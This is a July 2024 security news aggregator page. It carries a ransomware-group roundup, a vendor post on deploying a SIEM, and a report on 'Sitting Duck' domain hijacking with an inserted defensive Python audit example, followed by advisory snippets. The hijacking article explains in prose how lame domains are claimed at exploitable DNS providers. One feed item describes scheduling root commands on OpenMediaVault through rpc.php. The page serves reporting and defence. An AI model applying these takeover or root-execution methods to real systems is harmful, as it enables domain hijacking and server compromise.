The Impact of Major Ransomware Groups Among the ransomware groups that have emerged recently, five stand out for their impact on organizations and governments globally. These groups—Dark Angels, LockBit, BlackCat (ALPHV), Akira, and Black Basta—have made significant headlines due to their high-profile attacks and substantial ransom demands. Dark Angels has become a major player in the ransomware arena since its emergence in May 2022. Operating the Dunghill data leak site, Dark Angels is known for executing some of the largest ransomware attacks on record. In early 2024, ThreatLabz reported that one of Dark Angels' victims paid a record $75 million ransom. This staggering figure underscores the group's strategy of targeting a few high-value companies to secure substantial payouts. LockBit, which began operations in September 2019, continues to be a dominant force in the ransomware landscape. With its extensive affiliate network, LockBit has compromised over 2,000 systems worldwide, collecting more than $120 million in ransom. Known for its high-volume attack approach, LockBit often targets smaller businesses with relatively low ransom demands. Despite a major disruption in February 2024, when the FBI and UK authorities seized parts of LockBit’s infrastructure and approximately 7,000 decryption keys, the group quickly adapted and resumed its activities. The indictment of LockBit developer Dmitry Yuryevich Khoroshev further illustrates ongoing efforts to tackle this threat. BlackCat (ALPHV), infamous for its cross-platform capabilities, was a major ransomware threat until its shutdown in March 2024. Utilizing the Rust programming language, BlackCat targeted various operating systems. Although the group has disbanded, its affiliates are likely continuing their activities within other ransomware-as-a-service networks. Akira, which emerged in April 2023, quickly gained notoriety for its high volume of attacks. 
Likely an offshoot of the now-defunct Conti group, Akira has employed ransomware code similar to Conti’s leaked source code. Despite significant law enforcement actions, such as Operation Endgame targeting the initial access broker Bumblebee, Akira remains active and is expected to persist in its operations. Black Basta, identified in April 2022 as another successor to the Conti group, has used various methods to infiltrate corporate networks, including leveraging the initial access broker Qakbot. Despite setbacks from Operation Duck Hunt and other disruptions, Black Basta continues to innovate and execute new attacks. Looking Ahead: 2025 Predictions As ransomware threats evolve, several key trends are set to shape the cybersecurity industry in 2025, as highlighted in the ransomware report. Among these trends, one that caught everyone's attention is the rise of highly targeted attack strategies. Groups like Dark Angels are setting a precedent by focusing on a few high-value targets for substantial ransoms, which may influence other threat actors to adopt similar approaches. Another trend is the use of voice-based social engineering by specialized initial access brokers such as Qakbot and Scattered Spider, who will likely continue to exploit this tactic to infiltrate corporate networks. Generative AI is also expected to play a significant role in ransomware attacks, enabling threat actors to create more convincing and personalized attacks, including AI-generated voice impersonations. Additionally, increased transparency in cybersecurity is anticipated due to new SEC rules mandating stricter incident reporting, which should lead to improved practices. High-volume data exfiltration attacks, which exploit the fear of data leaks rather than relying on encryption, are expected to rise. The healthcare sector will remain a prime target due to its valuable data, necessitating enhanced security measures.
Finally, international collaboration will be crucial in disrupting global ransomware networks and combating cybercrime effectively.

image for Phase-by-phase SIEM  ...

 Business

We've already written about how, since a medium-sized company is an attractive target for cybercriminals, it can't be protected with just basic tools; it needs layered defenses. And a security information and event management (SIEM) system is a logical choice for a main center for such a multi-protection-layer system.
But how should a full-fledged SIEM in a company with 500 to 3000 employees be implemented? Today we tell you how, and as the title to this post suggests – it's best done phase by phase… First of all – choose a SIEM solution This one's easy: pick one of the few relatively inexpensive commercial products suitable for medium-sized businesses, or a "free" open-source solution. Why the quotation marks, you may ask. Because although the license costs nothing, the implementation will consume significant resources and a lot of your infosec team's time. You'll need much, much longer (several-fold) than you would for implementing a commercial product — both before and after you go live. Without going into the details, let's just say that there are no complete out-of-the-box open-source SIEM solutions. You'd have to assemble one from available components, adjusting them to be interoperable: an ELK stack or OpenSearch storage, collectors and agents based on one or several OSSEC/Snort/Suricata tools, investigation and response tools (Mozdef), and so on. The popular OSSIM and Prelude projects are likewise each a compilation of different tools, so supporting these is by no means easier, while scaling options are constrained by your IT/infosec team's available time and specific skills. Hardware is another thing to consider besides the direct software costs and person-hours. All but a few SIEM systems are quite demanding on hardware, and you'll have to purchase or rent a server for the go-live specifically. The Kaspersky Unified Monitoring and Analysis SIEM platform, with its best-in-class performance, is a welcome exception. It boasts sensible hardware requirements and also support for virtual deployments. You can deploy it on a single server or distribute it across the organization if needed by spinning up a collector in each of your offices. Define data sources for SIEM You need to work with your business to identify what to monitor with the SIEM.
This isn't as trivial as it may sound: besides helping you catch hackers, a SIEM can keep an eye on many other events, such as server overload or even some business performance metrics like the rate of inventory issue from a warehouse. Network devices, servers, ordinary computers and applications can all be data sources. Detailed planning of data sources ensures that the SIEM solution is properly configured and able to monitor all critical assets. EDR is typically the primary source, as it provides detailed information about server and workstation events structured in an infosec-friendly way, while generating little noise of irrelevant alerts. We obviously recommend Kaspersky EDR Expert, which can feed SIEM with both raw events data and detections associated with complex attacks. Configure the SIEM solution With the list of data sources approved, you now need to configure your SIEM solution to collect and analyze security data from those sources. This includes installing data collection agents and setting up correlation rules to identify potential security threats. Nearly every SIEM system comes prepackaged with default correlation rules – but they have to be adjusted to the company's realities. After the initial setup, some rules will require correction: you need to thoroughly test the situations of both an excess and a lack of alerts. Train employees SIEM solutions require trained personnel for effective management and monitoring. The infosec team at a small company typically consists of generalists – jacks of all trades. Therefore, each member of the team should be proficient in the basic SIEM skills. Luckily, a SIEM system saves time on routine work such as searching for applications storing outdated passwords or triaging the backlog of notifications in your inbox. This motivates everyone to use the new tool.
Support the SIEM system and keep it up to date SIEM is a living and breathing tool that needs regular support and adjustments as an organization grows and evolves. Noisy and ineffective rules must be deprioritized or deactivated, and further correlation rules designed to recognize new threats must be tested. You can learn more about the Kaspersky Unified Monitoring and Analysis platform and request a demo on its official web page.

image for Don’t Let Your Dom ...

 A Little Sunshine

More than a million domain names — including many registered by Fortune 100 firms and brand protection companies — are vulnerable to takeover by cybercriminals thanks to authentication weaknesses at a number of large web hosting providers and domain registrars, new research finds. Image: Shutterstock. Your
Web browser knows how to find a site like example.com thanks to the global Domain Name System (DNS), which serves as a kind of phone book for the Internet by translating human-friendly website names (example.com) into numeric Internet addresses. When someone registers a domain name, the registrar will typically provide two sets of DNS records that the customer then needs to assign to their domain. Those records are crucial because they allow Web browsers to find the Internet address of the hosting provider that is serving that domain. But potential problems can arise when a domain’s DNS records are “lame,” meaning the authoritative name server does not have enough information about the domain and can’t resolve queries to find it. A domain can become lame in a variety of ways, such as when it is not assigned an Internet address, or because the name servers in the domain’s authoritative record are misconfigured or missing. The reason lame domains are problematic is that a number of Web hosting and DNS providers allow users to claim control over a domain without accessing the true owner’s account at their DNS provider or registrar. If this threat sounds familiar, that’s because it is hardly new. Back in 2019, KrebsOnSecurity wrote about thieves employing this method to seize control over thousands of domains registered at GoDaddy, and using those to send bomb threats and sextortion emails (GoDaddy says they fixed that weakness in their systems not long after that 2019 story). In the 2019 campaign, the spammers created accounts on GoDaddy and were able to take over vulnerable domains simply by registering a free account at GoDaddy and being assigned the same DNS servers as the hijacked domain. Three years before that, the same pervasive weakness was described in a blog post by security researcher Matthew Bryant, who showed how one could commandeer at least 120,000 domains via DNS weaknesses at some of the world’s largest hosting providers. 
Incredibly, new research jointly released today by security experts at Infoblox and Eclypsium finds this same authentication weakness is still present at a number of large hosting and DNS providers. “It’s easy to exploit, very hard to detect, and it’s entirely preventable,” said Dave Mitchell, principal threat researcher at Infoblox. “Free services make it easier [to exploit] at scale. And the bulk of these are at a handful of DNS providers.” SITTING DUCKS Infoblox’s report found there are multiple cybercriminal groups abusing these stolen domains as a globally dispersed “traffic distribution system,” which can be used to mask the true source or destination of web traffic and to funnel Web users to malicious or phishing websites. Commandeering domains this way also can allow thieves to impersonate trusted brands and abuse their positive or at least neutral reputation when sending email from those domains, as we saw in 2019 with the GoDaddy attacks. “Hijacked domains have been used directly in phishing attacks and scams, as well as large spam systems,” reads the Infoblox report, which refers to lame domains as “Sitting Ducks.” “There is evidence that some domains were used for Cobalt Strike and other malware command and control (C2). Other attacks have used hijacked domains in targeted phishing attacks by creating lookalike subdomains. A few actors have stockpiled hijacked domains for an unknown purpose.” Eclypsium researchers estimate there are currently about one million Sitting Duck domains, and that at least 30,000 of them have been hijacked for malicious use since 2019. “As of the time of writing, numerous DNS providers enable this through weak or nonexistent verification of domain ownership for a given account,” Eclypsium wrote.
The security firms said they found a number of compromised Sitting Duck domains were originally registered by brand protection companies that specialize in defensive domain registrations (reserving look-alike domains for top brands before those names can be grabbed by scammers) and combating trademark infringement. For example, Infoblox found cybercriminal groups using a Sitting Duck domain called clickermediacorp[.]com, which was a CBS Interactive Inc. domain initially registered in 2009 at GoDaddy. However, in 2010 the DNS was updated to DNSMadeEasy.com servers, and in 2012 the domain was transferred to MarkMonitor. Another hijacked Sitting Duck domain — anti-phishing[.]org — was registered in 2003 by the Anti-Phishing Working Group (APWG), a cybersecurity not-for-profit organization that closely tracks phishing attacks. In many cases, the researchers discovered Sitting Duck domains that appear to have been configured to auto-renew at the registrar, but the authoritative DNS or hosting services were not renewed. The researchers say Sitting Duck domains all possess three attributes that makes them vulnerable to takeover: 1) the domain uses or delegates authoritative DNS services to a different provider than the domain registrar; 2) the authoritative name server(s) for the domain does not have information about the Internet address the domain should point to; 3) the authoritative DNS provider is “exploitable,” i.e. an attacker can claim the domain at the provider and set up DNS records without access to the valid domain owner’s account at the domain registrar. Image: Infoblox. How does one know whether a DNS provider is exploitable? There is a frequently updated list published on GitHub called “Can I take over DNS,” which has been documenting exploitability by DNS provider over the past several years. The list includes examples for each of the named DNS providers. 
In the case of the aforementioned Sitting Duck domain clickermediacorp[.]com, the domain was originally registered by , but it appears to have been hijacked by scammers by claiming it at the web hosting firm DNSMadeEasy, which is owned by Digicert, one of the industry’s largest issuers of digital certificates (SSL/TLS certificates). In an interview with KrebsOnSecurity, DNSMadeEasy founder and senior vice president Steve Job said the problem isn’t really his company’s to solve, noting that DNS providers who are also not domain registrars have no real way of validating whether a given customer legitimately owns the domain being claimed. “We do shut down abusive accounts when we find them,” Job said. “But it’s my belief that the onus needs to be on the [domain registrants] themselves. If you’re going to buy something and point it somewhere you have no control over, we can’t prevent that.” Infoblox, Eclypsium, and the DNS wiki listing at Github all say that web hosting giant Digital Ocean is among the vulnerable hosting firms. In response to questions, Digital Ocean said it was exploring options for mitigating such activity. “The DigitalOcean DNS service is not authoritative, and we are not a domain registrar,” Digital Ocean wrote in an emailed response. “Where a domain owner has delegated authority to our DNS infrastructure with their registrar, and they have allowed their ownership of that DNS record in our infrastructure to lapse, that becomes a ‘lame delegation’ under this hijack model. We believe the root cause, ultimately, is poor management of domain name configuration by the owner, akin to leaving your keys in your unlocked car, but we acknowledge the opportunity to adjust our non-authoritative DNS service guardrails in an effort to help minimize the impact of a lapse in hygiene at the authoritative DNS level. 
We’re connected with the research teams to explore additional mitigation options.” In a statement provided to KrebsOnSecurity, the hosting provider and registrar Hostinger said they were working to implement a solution to prevent lame duck attacks in the “upcoming weeks.” “We are working on implementing an SOA-based domain verification system,” Hostinger wrote. “Custom nameservers with a Start of Authority (SOA) record will be used to verify whether the domain truly belongs to the customer. We aim to launch this user-friendly solution by the end of August. The final step is to deprecate preview domains, a functionality sometimes used by customers with malicious intents. Preview domains will be deprecated by the end of September. Legitimate users will be able to use randomly generated temporary subdomains instead.” What did DNS providers that have struggled with this issue in the past do to address these authentication challenges? The security firms said that to claim a domain name, the best practice providers gave the account holder random name servers that required a change at the registrar before the domains could go live. They also found the best practice providers used various mechanisms to ensure that the newly assigned name server hosts did not match previous name server assignments. [Side note: Infoblox observed that many of the hijacked domains were being hosted at Stark Industries Solutions, a sprawling hosting provider that appeared two weeks before Russia invaded Ukraine and has become the epicenter of countless cyberattacks against enemies of Russia]. Both Infoblox and Eclypsium said that without more cooperation and less finger-pointing by all stakeholders in the global DNS, attacks on sitting duck domains will continue to rise, with domain registrants and regular Internet users caught in the middle. 
“Government organizations, regulators, and standards bodies should consider long-term solutions to vulnerabilities in the DNS management attack surface,” the Infoblox report concludes.
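The three takeover attributes listed above, and the provider-side best practice described just before this conclusion (random per-claim name servers that must appear at the registrar before the zone goes live, with no reuse of hosts from an earlier assignment), worked through as an added Python example that is not Infoblox, Eclypsium or any DNS provider's code. DNS lookups are injected as callables and driven by constructed sample data (hypothetical domains, providers and exploitable-provider list) so it runs offline; in production the callables would be backed by real SOA queries and registrar data.

```python
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class AuthResponse:
    """What a delegated name server answered to a SOA query for the domain."""
    rcode: str            # "NOERROR", "REFUSED", "SERVFAIL", ...
    aa: bool              # authoritative-answer flag set?
    answers: tuple = ()   # SOA records returned (empty when the zone is unknown)


def is_lame(resp):
    """Attribute 2: the server the parent delegates to cannot answer for the zone."""
    return resp.rcode != "NOERROR" or not resp.aa or len(resp.answers) == 0


def sitting_duck_risk(domain, registrar, parent_ns, query_soa, ns_provider, exploitable):
    """Check the report's three attributes for one domain.
    parent_ns: NS hosts published in the parent zone; query_soa(ns, domain) -> AuthResponse;
    ns_provider(ns) -> operator of that host; exploitable: providers allowing unverified claims."""
    providers = {ns_provider(ns) for ns in parent_ns}
    delegated_elsewhere = sorted(providers - {registrar})                       # attribute 1
    lame_servers = [ns for ns in parent_ns if is_lame(query_soa(ns, domain))]   # attribute 2
    exploitable_hit = sorted(providers & set(exploitable))                      # attribute 3
    return {
        "domain": domain,
        "delegated_elsewhere": delegated_elsewhere,
        "lame_servers": lame_servers,
        "exploitable_providers": exploitable_hit,
        "sitting_duck": bool(delegated_elsewhere and lame_servers and exploitable_hit),
    }


class ClaimVerifier:
    """Provider-side claim flow per the best practice above (hypothetical API): random
    per-claim NS hosts, go-live only once the parent delegation names them, and no reuse
    of hosts from lapsed claims, so a delegation still pointing at an old assignment
    verifies nobody."""

    def __init__(self, provider_zone, token=secrets.token_hex):
        self.provider_zone = provider_zone
        self._token = token      # injectable for deterministic tests
        self._current = {}       # (account, domain) -> frozenset of live NS hosts
        self._retired = {}       # domain -> set of NS hosts from lapsed claims

    def issue_nameservers(self, account, domain, count=2):
        key = (account, domain)
        if key not in self._current:
            names = set()
            while len(names) < count:
                name = f"ns-{self._token(4)}.{self.provider_zone}"
                if name not in self._retired.get(domain, set()):
                    names.add(name)
            self._current[key] = frozenset(names)
        return self._current[key]

    def release(self, account, domain):
        """Account lapses: retire its hosts so they can never validate a later claim."""
        names = self._current.pop((account, domain), frozenset())
        self._retired.setdefault(domain, set()).update(names)

    def verify_claim(self, account, domain, parent_ns):
        issued = self._current.get((account, domain))
        if not issued:
            return "no_assignment"
        parent = set(parent_ns)
        if issued <= parent:
            return "verified"
        if parent & self._retired.get(domain, set()):
            return "stale_delegation"   # registrar still points at a lapsed claim
        return "not_delegated"


# Constructed sample data (hypothetical names, not real domains or providers).
SAMPLE_REGISTRAR = "registrar.example"
SAMPLE_PARENT_NS = {
    "brand-defensive.example": ["ns1.lapsed-dns.example", "ns2.lapsed-dns.example"],
    "healthy.example": ["ns1.registrar.example", "ns2.registrar.example"],
}
SAMPLE_SOA = {  # only the healthy zone is actually served by its delegated hosts
    ("ns1.registrar.example", "healthy.example"): AuthResponse("NOERROR", True, ("soa",)),
    ("ns2.registrar.example", "healthy.example"): AuthResponse("NOERROR", True, ("soa",)),
}
SAMPLE_EXPLOITABLE = {"lapsed-dns.example"}   # stand-in for the "Can I take over DNS" list


def sample_query_soa(ns, domain):
    # A provider that no longer hosts the zone answers REFUSED (no AA flag, no SOA).
    return SAMPLE_SOA.get((ns, domain), AuthResponse("REFUSED", False))


def sample_ns_provider(ns):
    return ns.split(".", 1)[1]   # provider = zone the NS host lives under


def audit_samples():
    return {d: sitting_duck_risk(d, SAMPLE_REGISTRAR, ns, sample_query_soa,
                                 sample_ns_provider, SAMPLE_EXPLOITABLE)
            for d, ns in SAMPLE_PARENT_NS.items()}
```

Running audit_samples() flags only brand-defensive.example, whose delegation points at a provider that no longer serves the zone and lets anyone claim it; the ClaimVerifier shows why a registrar delegation left pointing at a lapsed assignment can never validate a newcomer's claim.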

 Trends, Reports, Analysis

The Blue Report 2024 highlights alarming findings, with 40% of environments vulnerable to total takeover, emphasizing the importance of cybersecurity. Prevention effectiveness has improved to 69%, but detection effectiveness has dropped to 12%.

 Malware and Vulnerabilities

The notorious Trik botnet, aka Phorpiex, is being sold in antivirus circles, offering advanced capabilities to evade detection. This C++ botnet includes modules such as a crypto clipper, a USB emitter, and a PE infector targeting crypto wallets.

 Malware and Vulnerabilities

Ubuntu has fixed two vulnerabilities in OpenVPN, a virtual private network software. These vulnerabilities could keep the closing session active or lead to denial of service. Canonical released security updates for affected Ubuntu releases.

 Feed

OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.

 Feed

Ubuntu Security Notice 6934-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.39 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 24.04 LTS. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

 Feed

Ubuntu Security Notice 6932-1 - It was discovered that the Hotspot component of OpenJDK 21 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered
that the Hotspot component of OpenJDK 21 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6931-1 - It was discovered that the Hotspot component of OpenJDK 17 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered
that the Hotspot component of OpenJDK 17 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6930-1 - It was discovered that the Hotspot component of OpenJDK 11 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered
that the Hotspot component of OpenJDK 11 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6929-1 - It was discovered that the Hotspot component of OpenJDK 8 was not properly performing bounds checks when handling certain UTF-8 strings, which could lead to a buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered
that the Hotspot component of OpenJDK 8 could be made to run into an infinite loop. If an automated system were tricked into processing excessively large symbols, an attacker could possibly use this issue to cause a denial of service.

 Feed

Ubuntu Security Notice 6928-1 - It was discovered that the Python ssl module contained a memory race condition when handling the APIs to obtain the CA certificates and certificate store statistics. This could possibly result in applications obtaining wrong results, leading to various SSL issues. It was discovered that the Python ipaddress module contained incorrect information about which IP address ranges were considered "private" or "globally reachable". This could possibly result in applications applying incorrect security policies.

Red Hat Security Advisory 2024-4937-03 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2024-4933-03 - An update for git-lfs is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2024-4922-03 - Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.

Meta, the parent company of Facebook, Instagram, and WhatsApp, agreed to a record $1.4 billion settlement with the U.S. state of Texas over allegations that it illegally collected biometric data of millions of users without their permission, marking one of the largest penalties levied by regulators against the tech giant. "This historic settlement demonstrates our commitment to standing up to

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems. The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East. "This form of attack is an

Japanese organizations are the target of a Chinese nation-state threat actor that leverages malware families like LODEINFO and NOOPDOOR to harvest sensitive information from compromised hosts while stealthily remaining under the radar in some cases for a time period ranging from two to three years. Israeli cybersecurity company Cybereason is tracking the campaign under the name Cuckoo Spear,

We’ll TL;DR the FUDdy introduction: we all know that phishing attacks are on the rise in scale and complexity, that AI is enabling more sophisticated attacks that evade traditional defenses, and the never-ending cybersecurity talent gap means we’re all struggling to keep security teams fully staffed.  Given that reality, security teams need to be able to monitor and respond to threats

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign. The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud. "Of those 107,000 malware samples, over 99,000 of

Companies in Russia and Moldova have been the target of a phishing campaign orchestrated by a little-known cyber espionage group known as XDSpy. The findings come from cybersecurity firm F.A.C.C.T., which said the infection chains lead to the deployment of a malware called DSDownloader. The activity was observed this month, it added. XDSpy is a threat actor of indeterminate origin that was first

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain. The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV). "Before issuing a certificate to a

2024-07
Aggregator history
Wednesday, July 31